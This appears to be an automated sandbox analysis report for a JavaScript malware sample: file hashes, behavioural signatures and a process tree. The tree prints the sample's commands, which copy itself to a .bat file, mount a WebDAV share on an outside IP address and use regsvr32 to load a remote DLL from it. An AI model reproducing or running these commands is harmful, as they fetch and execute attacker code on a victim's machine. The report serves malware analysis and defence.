Analysis
-
max time kernel
119s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
11-07-2024 04:04
Static task
static1
Behavioral task
behavioral1
Sample
206183970378932710.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
206183970378932710.js
Resource
win10v2004-20240709-en
General
-
Target
206183970378932710.js
-
Size
5KB
-
MD5
09bf52b5755a72033b918a673963dab6
-
SHA1
108bde246c9cc7a98a390b09ce62657c40ed8987
-
SHA256
b951a30339d4025a8aaef91f8ef1003a596ad7877c129a668b7a13889ae36045
-
SHA512
a9c4123c0f09714704a30cc686b4a781f2374e5fa8d95670574a916bfa5eb0416413718abb622a787348cf57a669c8f33374cd0be2af29eb9ab84ca19975aa85
-
SSDEEP
96:Vm3a+BLDDD0DDDD7wGiO9z37W7AnLpht7JnGS1khI:Bimz37GAnLpht7JnGS1khI
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2624 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2632 wrote to memory of 2500 2632 wscript.exe 31 PID 2632 wrote to memory of 2500 2632 wscript.exe 31 PID 2632 wrote to memory of 2500 2632 wscript.exe 31 PID 2500 wrote to memory of 2564 2500 cmd.exe 33 PID 2500 wrote to memory of 2564 2500 cmd.exe 33 PID 2500 wrote to memory of 2564 2500 cmd.exe 33 PID 2500 wrote to memory of 2624 2500 cmd.exe 34 PID 2500 wrote to memory of 2624 2500 cmd.exe 34 PID 2500 wrote to memory of 2624 2500 cmd.exe 34 PID 2500 wrote to memory of 2624 2500 cmd.exe 34 PID 2500 wrote to memory of 2624 2500 cmd.exe 34
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\206183970378932710.js1⤵
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\206183970378932710.js" "C:\Users\Admin\\qmqxhh.bat" && "C:\Users\Admin\\qmqxhh.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2564
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\202.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2624
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD509bf52b5755a72033b918a673963dab6
SHA1108bde246c9cc7a98a390b09ce62657c40ed8987
SHA256b951a30339d4025a8aaef91f8ef1003a596ad7877c129a668b7a13889ae36045
SHA512a9c4123c0f09714704a30cc686b4a781f2374e5fa8d95670574a916bfa5eb0416413718abb622a787348cf57a669c8f33374cd0be2af29eb9ab84ca19975aa85